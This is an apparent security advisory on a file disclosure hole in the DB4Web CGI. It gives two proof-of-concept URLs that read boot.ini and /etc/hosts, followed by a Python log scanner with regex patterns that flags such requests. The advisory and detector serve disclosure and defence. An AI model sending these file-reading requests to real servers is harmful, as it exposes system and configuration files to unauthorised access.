
DB4Web File Disclosure Vulnerability

This issue may be exploited with a web browser.

The following proof of concept has been supplied by Stefan Bogdohn:

On MS Windows systems the URL to retrieve the boot.ini file would look like:
http://db4web.server.system/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini

On Linux/Unix servers the following URL will show /etc/hosts:
http://db4web.server.system/cgi-bin/db4web_c/dbdirname//etc/hosts
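
A defender's view of the two request shapes above, as an added example that is not part of the original advisory: a log scanner that flags requests to the DB4Web CGI whose path after the database directory name is an absolute file path. The access-log format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# CGI locations taken from the two advisory URLs.
CGI_RE = re.compile(r"/(?:scripts|cgi-bin)/db4web_c(?:\.exe)?/", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request line in a log entry
DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")  # Windows drive-letter path such as c:\

# Constructed sample entries (common log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:00 +0000] "GET /scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini HTTP/1.0" 200 211',
    '198.51.100.7 - - [01/Jan/2000:00:00:01 +0000] "GET /cgi-bin/db4web_c/dbdirname//etc/hosts HTTP/1.0" 200 158',
    '192.0.2.44 - - [01/Jan/2000:00:00:02 +0000] "GET /cgi-bin/db4web_c/dbdirname/index HTTP/1.0" 200 900',
    '203.0.113.5 - - [01/Jan/2000:00:00:03 +0000] "GET /scripts/db4web_c.exe/dbdirname/c%253A%255Cboot.ini HTTP/1.0" 200 211',
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded paths are normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_path_info(url):
    """Return the absolute file path carried after the DB directory name, or None."""
    path = decode_fully(urlsplit(url).path)
    match = CGI_RE.search(path)
    if not match:
        return None
    # The first segment after the CGI name is the database directory name.
    _, sep, tail = path[match.end():].partition("/")
    if sep and (DRIVE_RE.match(tail) or tail.startswith(("/", "\\"))):
        return tail
    return None


def scan_log(lines):
    """Return (client, requested_file) for every flagged log entry."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        target = suspicious_path_info(m.group(1)) if m else None
        if target:
            hits.append((line.split()[0], target))
    return hits
```
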







 

Copyright 2008, SecurityFocus